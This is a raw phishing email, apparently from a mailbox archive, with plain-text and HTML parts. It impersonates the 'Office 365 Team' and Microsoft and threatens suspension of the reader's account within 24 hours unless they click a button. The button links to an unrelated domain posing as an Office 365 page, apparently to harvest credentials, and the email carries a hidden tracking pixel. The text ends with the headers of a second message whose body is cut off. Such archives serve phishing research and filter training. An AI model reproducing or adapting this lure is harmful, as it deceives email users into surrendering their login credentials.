From: live.office365.com
Date: Wed, 21 Aug 2019 12:40:16 +0000 (UTC)
Message-ID: <0W_RR6nVQeKQ8asIH7vC2Q@ismtpd0010p1iad1.sendgrid.net>
X-SG-EID: uk4PP0eEjut4P8/eKt92EMT2PN5rig6Ts8EnoW54QtArUXSDxQBvcXJiXF6qKt42o8yMc/fdlG8y3F
 rTT7YaQL+E6r2J71hFCnONgY4T9VBU+PUYdOUJznlU19M/2clSPU0Id0/xmbHzREQ73Qt6XUAtGxUx
 DLgCSNjt9xpwaqvOr5qUBtGtjy7di61gMXYY
Status: O
X-Status: 
X-Keywords:                  
X-UID: 159

You will not see this in a MIME-aware mail reader.
--===============0484956977==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


=20=20=20=20
=20=20=20=09=20
=09=20
=20=20=20
=20=20=20=20
=20=20=20=20
=20=20=20=20
You have new Office 365 message concerning your security update.
 Your account has exceeded its limit and needs to be verified, if not verif=
ied within 24 hours, we shall suspend your account from receiving or sendin=
g emails. To make sure you are protected by the latest security updates.

 Click on the button bellow to update your account
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20=20=20=20=20=20=20=20=20=20
=20
   protect your acounts online
=20

=20=20=20
=20=20=20=20
    Office 365 Team=20=20=20
=A9 Microsoft 2019

--===============0484956977==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><TABLE style=3D"MAX-WIDTH: 512px; BACKGROUND: =
rgb(255,255,255); WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: n=
one; COLOR: rgb(0,0,0); FONT: 400 16px roboto, robotodraft, helvetica, aria=
l, sans-serif; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px auto; LETTER-SPACING: nor=
mal; TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-styl=
e: initial; text-decoration-color: initial" cellSpacing=3D0 cellPadding=3D0=
 width=3D512 bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; BACKGROUND: rgb(243,243,243); BORDER-BOTTOM: rgb(236,236,236) 1px solid; =
PADDING-BOTTOM: 12px; PADDING-TOP: 12px; PADDING-LEFT: 12px; MARGIN: 0px; P=
ADDING-RIGHT: 12px" bgColor=3D#f3f3f3 width=3D"100%">
<TABLE style=3D"WIDTH: 487px; MIN-WIDTH: 100%" cellSpacing=3D0 cellPadding=
=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" vAlign=3Dmiddle width=3D"50%" align=3Dleft><SPAN style=3D"FO=
NT-SIZE: 12px; COLOR: rgb(76,76,76); MARGIN: 0px; DISPLAY: inline-block; LI=
NE-HEIGHT: 20px"><IMG style=3D"MAX-WIDTH: 754px; WIDTH: 150px" src=3D"https=
://resize.yandex.net/mailservice?url=3Dhttps%3A%2F%2Fwww.projetlys.com%2Fwp=
-content%2Fuploads%2F2017%2F02%2FOfc365_rgb_Orng166.png&amp;proxy=3Dyes&amp=
;key=3D3aef06c55be7b3dbdd0dd9593046570d"></SPAN></TD>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 10px; MARGIN: 0px; P=
ADDING-RIGHT: 0px" vAlign=3Dmiddle width=3D"50%" align=3Dright><BR></TD>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" width=3D1></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" align=3Dleft>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" width=3D"100%">
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; PADDING-BOTTOM: 10px; PADDING-TOP: 20px; PADDING-LEFT: 0px; MARGIN: 0px; =
PADDING-RIGHT: 0px" align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"PADDING-BOTTOM: 0px; TEXT-ALIGN: justify; PADDING-TOP: 0px; FO=
NT: 12px/18px roboto, robotodraft, helvetica, arial, sans-serif; PADDING-LE=
FT: 15px; MARGIN: 0px; PADDING-RIGHT: 15px" width=3D"100%" align=3Dcenter>
<H3 class=3D3eaa6ec49482a40f65d6cf85b8aa174egmail-85196785e88556ef41d3565ee=
ad580cdgmail-ydp3209e86ctitle-color style=3D"FONT-SIZE: 16px; COLOR: rgb(23=
5,104,31); PADDING-BOTTOM: 0px; TEXT-ALIGN: center; PADDING-TOP: 0px; PADDI=
NG-LEFT: 0px; MARGIN: 0px; LINE-HEIGHT: 24px; PADDING-RIGHT: 0px">You have =
new Office 365 message concerning your security update.</H3>
<P style=3D"FONT-SIZE: 15px; TEXT-ALIGN: left; MARGIN: 20px 0px 30px"><B st=
yle=3D"FONT: 13px verdana, geneva">Your&nbsp;account has exceeded its limit=
 and needs to be verified, if not verified within 24 hours, we shall suspen=
d your account from receiving or sending emails. To make sure you are prote=
cted by the latest security updates.</B><BR></P>
<P style=3D"FONT-SIZE: 15px; TEXT-ALIGN: left; MARGIN: 20px 0px 30px"><B st=
yle=3D"FONT: 13px verdana, geneva">Click on the button bellow to update you=
r account</B></P>
<P style=3D"FONT-SIZE: 15px; TEXT-ALIGN: left; MARGIN: 20px 0px 30px"><FONT=
 face=3DVerdana><STRONG>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;</STRONG></FONT></P>
<TABLE style=3D'BACKGROUND: rgb(255,255,255); WHITE-SPACE: normal; WORD-SPA=
CING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(0,0,0); FONT: 400 16px "helveti=
ca neue", helvetica, arial, sans-serif; TEXT-INDENT: 0px; text-decoration-s=
tyle: initial' align=3Dcenter>
<TBODY>
<TR>
<TD align=3Dcenter><A class=3D"e2e18b990f47d57a86515dfd28aabb7c8935ca372ad0=
57b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-anchor 8935c=
a372ad057b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-ancho=
r" style=3D"TEXT-DECORATION: underline; COLOR: rgb(25,106,212)" href=3D"htt=
ps://evolui.eco.br/office365/mail/x3342xsda/" rel=3D"noopener noreferrer"><=
SPAN style=3D'BACKGROUND: rgb(1,103,187); COLOR: rgb(255,255,255); PADDING-=
BOTTOM: 5px; PADDING-TOP: 5px; FONT: 12px "trebuchet ms", arial, helvetica,=
 sans-serif; PADDING-LEFT: 5px; PADDING-RIGHT: 5px; border-radius: 5px'>pro=
tect your acounts online</SPAN></A></TD></TR></TBODY></TABLE>
<P></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBOD=
Y></TABLE></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" align=3Dleft>
<TABLE style=3D"COLOR: rgb(153,153,153); PADDING-BOTTOM: 0px; PADDING-TOP: =
0px; PADDING-LEFT: 24px; PADDING-RIGHT: 24px" cellSpacing=3D0 cellPadding=
=3D0 width=3D"100%" bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" width=3D"100%" align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"BORDER-TOP: rgb(217,217,217) 1px solid; FONT-FAMILY: roboto, r=
obotodraft, helvetica, arial, sans-serif; PADDING-BOTTOM: 20px; TEXT-ALIGN:=
 center; PADDING-TOP: 12px; PADDING-LEFT: 0px; MARGIN: 0px; LINE-HEIGHT: 18=
px; PADDING-RIGHT: 0px" vAlign=3Dmiddle width=3D"100%" align=3Dcenter>
<DIV style=3D"TEXT-ALIGN: left"><SPAN style=3D"BACKGROUND: rgb(255,255,255)=
; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none=
; COLOR: rgb(76,76,76); TEXT-ALIGN: left; FONT: 700 x-small tahoma; DISPLAY=
: inline !important; TEXT-INDENT: 0px; text-decoration-style: initial">Offi=
ce 365 Team</SPAN></DIV>
<DIV style=3D"TEXT-ALIGN: left"><SPAN style=3D"BACKGROUND: rgb(255,255,255)=
; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none=
; COLOR: rgb(76,76,76); TEXT-ALIGN: left; FONT: 700 x-small tahoma; DISPLAY=
: inline !important; TEXT-INDENT: 0px; text-decoration-style: initial">
<UL class=3D"b967e9008453a644501e833336bee66ee7e36217a2965ff2608cb8b554220c=
f1c-list 94039ac9ad740f64df1413ca8af83ed5506a3cae414c4b4ae6cd3e05145902f6f-=
bare" style=3D'LIST-STYLE-TYPE: none; BACKGROUND: rgb(242,242,242); WHITE-S=
PACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(97,97,97)=
; PADDING-BOTTOM: 0px; TEXT-ALIGN: left; PADDING-TOP: 0px; FONT: 400 11px/1=
6px "segoe ui", segoeui, "helvetica neue", helvetica, arial, sans-serif; PA=
DDING-LEFT: 0px; MARGIN: 3px 0px; PADDING-RIGHT: 0px; TEXT-INDENT: 0px; tex=
t-decoration-style: initial'>
<LI style=3D"PADDING-BOTTOM: 4px; PADDING-TOP: 0px; PADDING-LEFT: 0px; DISP=
LAY: inline-block; PADDING-RIGHT: 24px">=A9 Microsoft 2019</LI></UL></SPAN>=
</DIV></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY=
></TABLE>
<img src=3D"https://u1555193.ct.sendgrid.net/wf/open?upn=3DpefIbq-2F0PhcN2q=
ttzAUOKcqrOrDw1L6ncHuzcceg2g-2BY54jbvn-2FcjEtV7u6yMLmOJ9qf9nmmWuNZKpE4XI8tG=
hRT30WbWqPebWpNEvHS6c-2BrhYZ1wE1cCjI4IkuFH6ALpXqZ-2BVWxjP-2FmiLQil-2FtrZI-2=
BfI8I2-2B376XZ-2FRl0cde9h7AB8PXZtOZBB2GFYaeOkkFhyORaiaZMx0-2FAiCnRIHTScMx-2=
F4YKT0XmJkdHrkyPVA-3D" alt=3D"" width=3D"1" height=3D"1" border=3D"0" style=
=3D"height:1px !important;width:1px !important;border-width:0 !important;ma=
rgin-top:0 !important;margin-bottom:0 !important;margin-right:0 !important;=
margin-left:0 !important;padding-top:0 !important;padding-bottom:0 !importa=
nt;padding-right:0 !important;padding-left:0 !important;"/>
</BODY></HTML>

--===============0484956977==--

From jose@monkey.org Thu Aug 22 14:52:08 2019 +0000
Return-Path: aju@brandmeadv.com
Delivered-To: jose@monkey.org
X-FDA: 75850353936.04.legs16_4ccf39752d93c
X-Spam-Summary: 50,0,0,7466b5f407ec3e8c,d41d8cd98f00b204,aju@brandmeadv.com,:,RULES_HIT:2:41:72:355:375:379:495:800:962:967:973:983:988:989:1021:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1436:1437:1513:1515:1516:1517:1521:1535:1561:1588:1589:1593:1594:1714:1730:1747:1777:1792:2393:2525:2527:2561:2564:2682:2685:2828:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3867:3870:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4049:4119:4321:5007:6117:6119:6261:6650:6678:7652:7809:8518:8583:8599:8603:8957:9025:9388:9416:9469:9908:10004:11473:11658:11914:12043:12297:12517:12519:12555:12740:12895:12955:12958:12959:12967:12968:12986:13190:13229:13439:14096:18000:21080:21433:21451:21483:21524:21627:21810:21819:21939:30022:30054,0,RBL:213.139.0.17-irl.urbl.hostedemail.com-127.0.0.150,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fs,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:83,LUA_SUMMARY:none
X-HE-Tag: legs16_4ccf39752d93c
X-Filterd-Recvd-Size: 8868
Received: from smtp.easynet.es (smtp.easynet.es [213.139.0.17])
	by imf27.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 22 Aug 2019 14:52:07 +0000 (UTC)
Received: from [84.38.133.24] (helo=brandmeadv.com)
	by smtp.easynet.es with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32)
	(Exim 4.72)
	(envelope-from <aju@brandmeadv.com>)
	id 1i0o8Q-0000NE-Ew
	for jose@monkey.org; Thu, 22 Aug 2019 16:32:19 +0200
